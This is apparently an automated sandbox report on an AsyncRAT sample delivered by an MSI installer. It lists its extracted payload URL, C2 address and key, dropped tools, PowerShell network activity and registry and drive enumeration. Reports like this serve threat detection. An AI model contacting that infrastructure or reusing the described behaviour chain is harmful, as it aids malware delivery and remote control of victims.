Analysis
-
max time kernel
780s -
max time network
788s -
platform
windows10-2004_x64 -
resource
win10v2004-20250410-en -
resource tags
arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system -
submitted
20/04/2025, 09:57
Static task
static1
URLScan task
urlscan1
General
Malware Config
Extracted
http://185.39.17.70/zgrnf/rc.mp4
Extracted
asyncrat
LoaderPanel
Default
185.39.17.70:8848
hqjitjybornneksp
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 597 6016 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 597 6016 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Unlocker.exe Key value queried \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation Unlocker.exe -
Executes dropped EXE 20 IoCs
pid Process 1544 159ad5b03e718041b0f3cdc902a5ce65c351a47487781fbd67c3d59210724ae8.exe 1712 f253c248a7d48cdf25eec88538e6366689ce459c156511f8f32a3a27d9a90eee.exe 4004 NSudoLG.exe 2492 7z.exe 5936 Unlocker.exe 5100 Unlocker.exe 5112 IObitUnlocker.exe 312 IObitUnlocker.exe 4056 IObitUnlocker.exe 2464 IObitUnlocker.exe 2112 IObitUnlocker.exe 3356 IObitUnlocker.exe 5912 IObitUnlocker.exe 3028 IObitUnlocker.exe 2396 IObitUnlocker.exe 5536 IObitUnlocker.exe 1472 IObitUnlocker.exe 556 IObitUnlocker.exe 5848 IObitUnlocker.exe 4776 IObitUnlocker.exe -
Loads dropped DLL 15 IoCs
pid Process 5180 msedge.exe 5112 IObitUnlocker.exe 312 IObitUnlocker.exe 4056 IObitUnlocker.exe 2464 IObitUnlocker.exe 2112 IObitUnlocker.exe 3356 IObitUnlocker.exe 5912 IObitUnlocker.exe 3028 IObitUnlocker.exe 2396 IObitUnlocker.exe 5536 IObitUnlocker.exe 1472 IObitUnlocker.exe 556 IObitUnlocker.exe 5848 IObitUnlocker.exe 4776 IObitUnlocker.exe -
pid Process 2540 powershell.exe 5020 powershell.exe 6000 powershell.exe 6016 powershell.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 103 raw.githubusercontent.com 104 raw.githubusercontent.com 105 raw.githubusercontent.com -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 2200 tasklist.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 6016 set thread context of 6068 6016 powershell.exe 255 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1541831724\hyph-es.hyb msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\edge_driver.js msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-hub\fr\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-shared-components\fr-CA\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-tokenized-card\ru\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1541831724\hyph-cu.hyb msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\bnpl\bnpl.bundle.js.LICENSE.txt msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1541831724\hyph-hu.hyb msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-notification\ja\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-notification-shared\zh-Hans\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-shared-components\sv\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_2116390022\manifest.fingerprint msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1952227174\Part-FR msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-hub\hu\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-notification-shared\id\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\wallet-webui-792.b1180305c186d50631a2.chunk.js msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1541831724\hyph-mr.hyb msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1541831724\hyph-pa.hyb msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1541831724\hyph-sq.hyb msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1541831724\hyph-und-ethi.hyb msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\app-setup.js msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\vendor.bundle.js msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\wallet-webui-560.da6c8914bf5007e1044c.chunk.js msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\wallet-webui-925.baa79171a74ad52b0a67.chunk.js msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1258258660\sets.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1541831724\hyph-cs.hyb msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1541831724\hyph-sl.hyb msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1541831724\hyph-pt.hyb msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-mobile-hub\es\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-shared-components\da\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-hub\pl\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-tokenized-card\sv\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\wallet\wallet-checkout-eligible-sites-pre-stable.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\bnpl\bnpl.bundle.js msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-notification-shared\nl\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\wallet-icon.svg msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_2125430524\manifest.fingerprint msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\wallet\wallet-eligibile-aad-users.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-hub\cs\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-mobile-hub\zh-Hant\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-shared-components\en-GB\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-shared-components\th\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-tokenized-card\ar\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-tokenized-card\de\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_844880523\_platform_specific\win_x64\widevinecdm.dll msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_2116390022\manifest.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_34431294\manifest.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1541831724\hyph-gu.hyb msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1541831724\hyph-lv.hyb msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_849134569\edge_checkout_page_validator.js msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-notification\en-GB\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-notification-shared\pt-PT\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\Notification\notification_fast.html msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\Wallet-Checkout\wallet-drawer.html msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-ec\de\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-ec\zh-Hans\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-notification-shared\ko\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\load-hub-i18n.bundle.js msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\Wallet-Checkout\load-ec-deps.bundle.js msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\crypto.bundle.js msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\driver-signature.txt msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-ec\fr-CA\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\i18n-ec\th\strings.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5180_1089469578\json\wallet\wallet-checkout\checkoutdata.json msedge.exe -
Drops file in Windows directory 9 IoCs
description ioc Process File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{5290F4F1-5D2A-4EAE-9B45-B59914F663D4} msiexec.exe File opened for modification C:\Windows\Installer\MSIFF77.tmp msiexec.exe File created C:\Windows\Installer\e5fff0c.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI26F7.tmp msiexec.exe File created C:\Windows\Installer\e5fff0a.msi msiexec.exe File opened for modification C:\Windows\Installer\e5fff0a.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3500 sc.exe 5964 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 52 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IObitUnlocker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IObitUnlocker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IObitUnlocker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IObitUnlocker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IObitUnlocker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7z.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mode.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IObitUnlocker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IObitUnlocker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IObitUnlocker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IObitUnlocker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IObitUnlocker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IObitUnlocker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IObitUnlocker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IObitUnlocker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IObitUnlocker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000070e435a20a91b7cb0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000070e435a20000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090070e435a2000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d70e435a2000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000070e435a200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3140 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Kills process with taskkill 1 IoCs
pid Process 6008 taskkill.exe -
Modifies data under HKEY_USERS 9 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133896166498187604" msedge.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\29 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize\AppsUseLightTheme = "0" reg.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\27\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\28 msiexec.exe -
Modifies registry class 27 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Local Settings msedge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\1F4F0925A2D5EAE4B9545B99416F364D\DefaultFeature msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1F4F0925A2D5EAE4B9545B99416F364D\ProductName = "BatchInstallerFinal" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1F4F0925A2D5EAE4B9545B99416F364D\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1F4F0925A2D5EAE4B9545B99416F364D\InstanceType = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\06B55B94726C2574FA40E2F795DBA41E\1F4F0925A2D5EAE4B9545B99416F364D msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1F4F0925A2D5EAE4B9545B99416F364D\SourceList\LastUsedSource = "n;2;C:\\Users\\Admin\\Downloads\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1F4F0925A2D5EAE4B9545B99416F364D\SourceList\Net\2 = "C:\\Users\\Admin\\Downloads\\" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1F4F0925A2D5EAE4B9545B99416F364D\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1F4F0925A2D5EAE4B9545B99416F364D\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1F4F0925A2D5EAE4B9545B99416F364D\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1F4F0925A2D5EAE4B9545B99416F364D\SourceList\PackageName = "b44520d14068181d5d7ffbeb1b15dbf23a27bf80bdfe610b75385755c2dde35c.msi" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1F4F0925A2D5EAE4B9545B99416F364D\SourceList\Media msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1F4F0925A2D5EAE4B9545B99416F364D\SourceList\Media\1 = ";" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1F4F0925A2D5EAE4B9545B99416F364D\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\1F4F0925A2D5EAE4B9545B99416F364D msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1F4F0925A2D5EAE4B9545B99416F364D\PackageCode = "49F7F871D79DAB7408062B5E8FA0F6E3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\06B55B94726C2574FA40E2F795DBA41E msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3630502724-2561614198-3854231964-1000\{721ACD2F-3515-4137-A6F6-9F6E3075373B} msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1F4F0925A2D5EAE4B9545B99416F364D msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1F4F0925A2D5EAE4B9545B99416F364D\Version = "16777216" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1F4F0925A2D5EAE4B9545B99416F364D\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1F4F0925A2D5EAE4B9545B99416F364D\AuthorizedLUAApp = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1F4F0925A2D5EAE4B9545B99416F364D\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1F4F0925A2D5EAE4B9545B99416F364D\SourceList\Net\1 = "C:\\Users\\Admin\\Downloads\\b44520d14068181d5d7ffbeb1b15dbf23a27bf80bdfe610b75385755c2dde35c\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1F4F0925A2D5EAE4B9545B99416F364D\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\Downloads\\b44520d14068181d5d7ffbeb1b15dbf23a27bf80bdfe610b75385755c2dde35c\\" msiexec.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2432 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5212 msedge.exe 5212 msedge.exe 5896 msiexec.exe 5896 msiexec.exe 2540 powershell.exe 2540 powershell.exe 2540 powershell.exe 5020 powershell.exe 5020 powershell.exe 5020 powershell.exe 6000 powershell.exe 6000 powershell.exe 6000 powershell.exe 6016 powershell.exe 6016 powershell.exe 6016 powershell.exe 5896 msiexec.exe 5896 msiexec.exe 4004 NSudoLG.exe 4004 NSudoLG.exe 5112 IObitUnlocker.exe 5112 IObitUnlocker.exe 5112 IObitUnlocker.exe 5112 IObitUnlocker.exe 312 IObitUnlocker.exe 312 IObitUnlocker.exe 312 IObitUnlocker.exe 312 IObitUnlocker.exe 4056 IObitUnlocker.exe 4056 IObitUnlocker.exe 4056 IObitUnlocker.exe 4056 IObitUnlocker.exe 2464 IObitUnlocker.exe 2464 IObitUnlocker.exe 2464 IObitUnlocker.exe 2464 IObitUnlocker.exe 2112 IObitUnlocker.exe 2112 IObitUnlocker.exe 2112 IObitUnlocker.exe 2112 IObitUnlocker.exe 3356 IObitUnlocker.exe 3356 IObitUnlocker.exe 3356 IObitUnlocker.exe 3356 IObitUnlocker.exe 5912 IObitUnlocker.exe 5912 IObitUnlocker.exe 5912 IObitUnlocker.exe 5912 IObitUnlocker.exe 3028 IObitUnlocker.exe 3028 IObitUnlocker.exe 3028 IObitUnlocker.exe 3028 IObitUnlocker.exe 2396 IObitUnlocker.exe 2396 IObitUnlocker.exe 2396 IObitUnlocker.exe 2396 IObitUnlocker.exe 5536 IObitUnlocker.exe 5536 IObitUnlocker.exe 5536 IObitUnlocker.exe 5536 IObitUnlocker.exe 1472 IObitUnlocker.exe 1472 IObitUnlocker.exe 1472 IObitUnlocker.exe 1472 IObitUnlocker.exe -
Suspicious behavior: LoadsDriver 23 IoCs
